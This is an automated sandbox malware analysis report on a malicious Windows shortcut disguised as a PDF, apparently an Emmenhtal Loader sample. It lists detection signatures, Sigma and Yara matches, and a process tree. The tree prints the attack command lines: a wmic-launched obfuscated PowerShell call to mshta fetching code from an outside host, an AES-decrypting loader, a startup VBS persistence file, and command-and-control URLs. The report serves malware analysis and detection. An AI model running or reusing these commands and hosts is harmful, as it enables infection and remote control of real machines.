
Windows Analysis Report
HateSpeech2024_Summary.pdf.lnk.bin.lnk

Overview

General Information

Sample name:HateSpeech2024_Summary.pdf.lnk.bin.lnk
Analysis ID:1584384
MD5:97d7ccb68cdc1beaee32700a58e8f901
SHA1:c16d12acb3de008be42cd1d5527ee5ecd51d6354
SHA256:9315c00b9914f987381604b289e426dab0e6c8eefd7ccb0656c2cde5503800c7
Tags:lnkuser-zhuzhu0009
Infos:

Detection

Emmenhtal Loader, MalLnk
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emmenhtal Loader
Yara detected malicious lnk
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Drops VBS files to the startup folder
Found PHP interpreter
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • WMIC.exe (PID: 7560 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7628 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7872 cmdline: "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 8032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Length)); sal fd $PwiNROQ.Substring(3,3); fd $PwiNROQ.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 7292 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 2924 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7640 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,17340846460468953801,1805849140092646528,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • php_bot_downloader_v2-AVERAGE-BOI-CLN.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe" MD5: F63E0C410E4CA83CDA47BA4871AEAC30)
              • cmd.exe (PID: 9080 cmdline: "C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 9088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tar.exe (PID: 9124 cmdline: tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming" MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24)
              • cmd.exe (PID: 9160 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • php.exe (PID: 9208 cmdline: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php MD5: FA544CF95C1B82AFC25B9C5C55C5AD73)
  • svchost.exe (PID: 7964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 8340 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2672 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • php.exe (PID: 8264 cmdline: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php MD5: FA544CF95C1B82AFC25B9C5C55C5AD73)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
HateSpeech2024_Summary.pdf.lnk.bin.lnk | JoeSecurity_MalLnk | Yara detected malicious lnk | Joe Security |
    Source | Rule | Description | Author | Strings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1] | JoeSecurity_EmmenhtalLoader | Yara detected Emmenhtal Loader | Joe Security |
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1] | emmenhtal_strings_hta_exe | Emmenhtal Loader string | Sekoia.io
      • 0xccdd7:$char: = String.fromCharCode(Yb,Zy,
      • 0xccdd0:$var: var
      • 0x11a00e:$eval: eval(
      • 0xccc4f:$script1: <script>
      • 0x11a004:$script1: <script>
      • 0xd5bfb:$script2: </script>MZ
      • 0x11a02a:$script2: </script>MZ
      Source | Rule | Description | Author | Strings
      Process Memory Space: mshta.exe PID: 7872 | JoeSecurity_EmmenhtalLoader | Yara detected Emmenhtal Loader | Joe Security |

        System Summary

        Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm, CommandLine: "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7788, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm, ProcessId: 7872, ProcessName: mshta.exe
        Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Length)); sal fd $PwiNROQ.Substring(3,3); fd $Pw
        Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')", ProcessId: 7560, ProcessName: WMIC.exe
        Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , ProcessId: 8340, ProcessName: wscript.exe
        Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Length)); sal fd $PwiNROQ.Substring(3,3); fd $Pw
        Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8032, TargetFilename: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
        Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , ProcessId: 8340, ProcessName: wscript.exe
        Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7560, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm'), ProcessId: 7628, ProcessName: powershell.exe
        Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7964, ProcessName: svchost.exe

        Data Obfuscation

        Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe, ProcessId: 9208, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs
        No Suricata rule has matched


        AV Detection

        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnk; ReversingLabs: Detection: 23%
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnk; Virustotal: Detection: 27%
        Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
        Source: C:\Windows\System32\tar.exe; File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\license.txt
        Source: C:\Windows\System32\tar.exe; File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\readme-redist-bins.txt
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php8ts.pdb source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000003.1677761143.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB139C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1839341806.000001EB13A67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842211450.000001EB13116000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1679419864.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843243271.000001EB13118000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841460930.000001EB0EFB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841125562.000001EB1315A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842473193.000001EB138C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841348809.000001EB13071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1839954374.000001EB15CC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840963450.000001EB139FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php.pdb source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_pdo_mysql.pdb source: php_pdo_mysql.dll.21.dr
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_mysqli.pdb source: php_mysqli.dll.21.dr
        Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000003.1677761143.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB139C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842211450.000001EB13116000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1679419864.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843243271.000001EB13118000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842473193.000001EB138C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841348809.000001EB13071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php.pdb"""UGP source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
        Source: Binary string: 1D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php8ts.pdb source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp, php.exe, 0000001C.00000002.2896990047.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp, php.exe, 0000001C.00000002.2896990047.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_sysvshm.pdb source: php_sysvshm.dll.21.dr
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_zend_test.pdb source: php_zend_test.dll.21.dr
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe; Code function: 12_2_00007FF658E42110 FindFirstFileExW,12_2_00007FF658E42110
        Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
        Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
        Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\
        Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\Roaming\
        Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\
        Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe; Code function: 12_2_00007FF658E22270 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,12_2_00007FF658E22270
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.php.net/report.php
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.php.net/report.phpPlease
        Source: svchost.exe, 00000006.00000002.2897591888.000001B97E600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://myfilebuilders.com
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://php.net/xpath
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://php.net/xpathfunctionStringInvalid
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://relaxng.org/ns/structure/1.0
        Source: php.exe, 0000001C.00000002.2892874564.0000014E5D471000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp
        Source: php.exe, 0000001C.00000002.2892874564.0000014E5D400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/accept.php?ref=2
        Source: php.exe, 00000018.00000002.2893070291.000001E12DC00000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.php
        Source: php.exe, 00000018.00000002.2893070291.000001E12DC57000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D456000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z3
        Source: php.exe, 0000001C.00000002.2892874564.0000014E5D456000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30bE
        Source: php.exe, 00000018.00000002.2893070291.000001E12DC57000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30r
